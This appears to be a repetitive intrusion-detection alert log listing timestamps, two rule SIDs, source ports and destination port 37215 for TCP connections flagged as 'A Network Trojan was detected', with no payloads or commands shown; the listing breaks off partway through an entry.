              Timestamp:05/24/24-10:58:58.391328
              SID:2835222
              Source Port:51530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574812
              SID:2835222
              Source Port:36314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685367
              SID:2829579
              Source Port:58892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431447
              SID:2835222
              Source Port:55100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343669
              SID:2835222
              Source Port:53810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700884
              SID:2829579
              Source Port:45340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.684924
              SID:2829579
              Source Port:56558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520207
              SID:2829579
              Source Port:58058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368787
              SID:2829579
              Source Port:54688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881811
              SID:2835222
              Source Port:33754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625681
              SID:2835222
              Source Port:32956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044703
              SID:2835222
              Source Port:60738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279500
              SID:2829579
              Source Port:52332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495284
              SID:2829579
              Source Port:54000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154182
              SID:2829579
              Source Port:36886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162183
              SID:2835222
              Source Port:58260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116665
              SID:2835222
              Source Port:59982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186136
              SID:2835222
              Source Port:54692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151134
              SID:2829579
              Source Port:41698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116294
              SID:2835222
              Source Port:56354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763331
              SID:2835222
              Source Port:49458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398222
              SID:2835222
              Source Port:53350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543813
              SID:2829579
              Source Port:34672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245798
              SID:2835222
              Source Port:58748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574799
              SID:2835222
              Source Port:46448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348099
              SID:2829579
              Source Port:56298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382946
              SID:2829579
              Source Port:47266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598186
              SID:2829579
              Source Port:41658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062275
              SID:2829579
              Source Port:36532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118923
              SID:2829579
              Source Port:46704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111917
              SID:2829579
              Source Port:39768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120727
              SID:2829579
              Source Port:51380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398418
              SID:2835222
              Source Port:56812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705216
              SID:2835222
              Source Port:45366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048715
              SID:2835222
              Source Port:38044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.286853
              SID:2829579
              Source Port:48420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575245
              SID:2835222
              Source Port:49380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103701
              SID:2835222
              Source Port:43576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448822
              SID:2829579
              Source Port:45188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207623
              SID:2829579
              Source Port:41674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576486
              SID:2829579
              Source Port:57984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148755
              SID:2835222
              Source Port:54062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186958
              SID:2829579
              Source Port:37914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166227
              SID:2835222
              Source Port:38392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.743041
              SID:2829579
              Source Port:43124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409170
              SID:2829579
              Source Port:50426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432461
              SID:2835222
              Source Port:57708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574553
              SID:2829579
              Source Port:38434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991866
              SID:2829579
              Source Port:42542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049854
              SID:2829579
              Source Port:38788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485770
              SID:2829579
              Source Port:45248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973874
              SID:2835222
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.632738
              SID:2835222
              Source Port:41848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457803
              SID:2835222
              Source Port:46616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118360
              SID:2829579
              Source Port:47838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109579
              SID:2835222
              Source Port:34646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360872
              SID:2835222
              Source Port:46080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430526
              SID:2835222
              Source Port:38414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661150
              SID:2835222
              Source Port:39282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252947
              SID:2829579
              Source Port:57296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117355
              SID:2835222
              Source Port:53580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802064
              SID:2829579
              Source Port:56610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.877825
              SID:2829579
              Source Port:35794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725503
              SID:2835222
              Source Port:52438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343485
              SID:2829579
              Source Port:50578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377174
              SID:2829579
              Source Port:52344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507103
              SID:2835222
              Source Port:49138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078329
              SID:2835222
              Source Port:54964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543508
              SID:2829579
              Source Port:45718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397747
              SID:2829579
              Source Port:57940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368635
              SID:2835222
              Source Port:50372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157605
              SID:2829579
              Source Port:57806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270474
              SID:2835222
              Source Port:46118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059476
              SID:2835222
              Source Port:36456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252515
              SID:2829579
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156303
              SID:2829579
              Source Port:41210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664475
              SID:2829579
              Source Port:45724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568663
              SID:2829579
              Source Port:50358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234691
              SID:2829579
              Source Port:59268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.398307
              SID:2835222
              Source Port:45644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428862
              SID:2829579
              Source Port:52210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454398
              SID:2835222
              Source Port:55206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828481
              SID:2829579
              Source Port:56258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664732
              SID:2835222
              Source Port:47918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234693
              SID:2835222
              Source Port:45322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594790
              SID:2835222
              Source Port:37098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.248940
              SID:2829579
              Source Port:44908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100475
              SID:2829579
              Source Port:53770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234422
              SID:2835222
              Source Port:33802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622934
              SID:2835222
              Source Port:33002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453583
              SID:2829579
              Source Port:45910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545481
              SID:2829579
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397224
              SID:2829579
              Source Port:59888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101638
              SID:2829579
              Source Port:42982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575119
              SID:2835222
              Source Port:59250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282805
              SID:2835222
              Source Port:38870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421560
              SID:2829579
              Source Port:46782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992101
              SID:2829579
              Source Port:36946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515538
              SID:2835222
              Source Port:58320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055431
              SID:2835222
              Source Port:46880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642267
              SID:2835222
              Source Port:43932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204784
              SID:2835222
              Source Port:51238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574749
              SID:2829579
              Source Port:47200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641636
              SID:2829579
              Source Port:38310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159747
              SID:2835222
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705384
              SID:2829579
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118463
              SID:2835222
              Source Port:48808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.586077
              SID:2829579
              Source Port:35470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201154
              SID:2829579
              Source Port:60930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575776
              SID:2829579
              Source Port:43526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101543
              SID:2829579
              Source Port:46374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485829
              SID:2835222
              Source Port:55286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207704
              SID:2835222
              Source Port:39762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545907
              SID:2835222
              Source Port:43668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100636
              SID:2835222
              Source Port:47460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967860
              SID:2829579
              Source Port:33188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111983
              SID:2835222
              Source Port:40402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481413
              SID:2829579
              Source Port:38090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.146982
              SID:2829579
              Source Port:39408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150928
              SID:2829579
              Source Port:46940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458352
              SID:2829579
              Source Port:37176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404464
              SID:2829579
              Source Port:56450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448310
              SID:2835222
              Source Port:36510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.271160
              SID:2835222
              Source Port:53374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638177
              SID:2835222
              Source Port:43900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516488
              SID:2829579
              Source Port:50694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630747
              SID:2835222
              Source Port:44780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857484
              SID:2829579
              Source Port:50504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517166
              SID:2829579
              Source Port:59050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692648
              SID:2829579
              Source Port:38496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702653
              SID:2835222
              Source Port:45666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484623
              SID:2835222
              Source Port:34530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444000
              SID:2835222
              Source Port:58660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705310
              SID:2835222
              Source Port:52226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575314
              SID:2835222
              Source Port:40758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447933
              SID:2835222
              Source Port:36076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536204
              SID:2829579
              Source Port:38460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606362
              SID:2829579
              Source Port:39090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624777
              SID:2835222
              Source Port:56494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103386
              SID:2835222
              Source Port:58782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535620
              SID:2835222
              Source Port:44840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574089
              SID:2835222
              Source Port:50816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450566
              SID:2829579
              Source Port:42316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536559
              SID:2835222
              Source Port:40032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111337
              SID:2835222
              Source Port:36842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429799
              SID:2835222
              Source Port:48468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073522
              SID:2835222
              Source Port:34756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361296
              SID:2835222
              Source Port:33000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.374798
              SID:2829579
              Source Port:37536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801716
              SID:2829579
              Source Port:52606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110787
              SID:2835222
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575302
              SID:2835222
              Source Port:46184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506020
              SID:2829579
              Source Port:49088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245247
              SID:2829579
              Source Port:54212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750648
              SID:2829579
              Source Port:43376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.986379
              SID:2829579
              Source Port:37946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099941
              SID:2829579
              Source Port:54092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345359
              SID:2829579
              Source Port:60026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625630
              SID:2835222
              Source Port:59502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637846
              SID:2835222
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833213
              SID:2829579
              Source Port:32826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.821171
              SID:2829579
              Source Port:53446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861919
              SID:2835222
              Source Port:58736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061406
              SID:2835222
              Source Port:39564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396086
              SID:2835222
              Source Port:51208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425446
              SID:2835222
              Source Port:53688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289228
              SID:2835222
              Source Port:40368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543618
              SID:2835222
              Source Port:57616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.458019
              SID:2835222
              Source Port:36568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506302
              SID:2835222
              Source Port:48484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859548
              SID:2829579
              Source Port:57520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979736
              SID:2835222
              Source Port:56176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063060
              SID:2829579
              Source Port:48378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341141
              SID:2835222
              Source Port:43944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249578
              SID:2829579
              Source Port:47450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982052
              SID:2829579
              Source Port:59008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.774605
              SID:2829579
              Source Port:33064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340856
              SID:2829579
              Source Port:47910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826702
              SID:2835222
              Source Port:41936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152945
              SID:2835222
              Source Port:39608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530801
              SID:2835222
              Source Port:43934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482364
              SID:2835222
              Source Port:33012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868496
              SID:2829579
              Source Port:34364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501600
              SID:2829579
              Source Port:37882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112020
              SID:2829579
              Source Port:57636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771766
              SID:2835222
              Source Port:58692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167390
              SID:2835222
              Source Port:49564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534408
              SID:2829579
              Source Port:41398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572057
              SID:2835222
              Source Port:55288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433327
              SID:2829579
              Source Port:35608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639749
              SID:2835222
              Source Port:47596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061771
              SID:2835222
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313700
              SID:2835222
              Source Port:37136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269284
              SID:2835222
              Source Port:38812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420943
              SID:2829579
              Source Port:33128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232538
              SID:2829579
              Source Port:41476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117249
              SID:2829579
              Source Port:33020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.376271
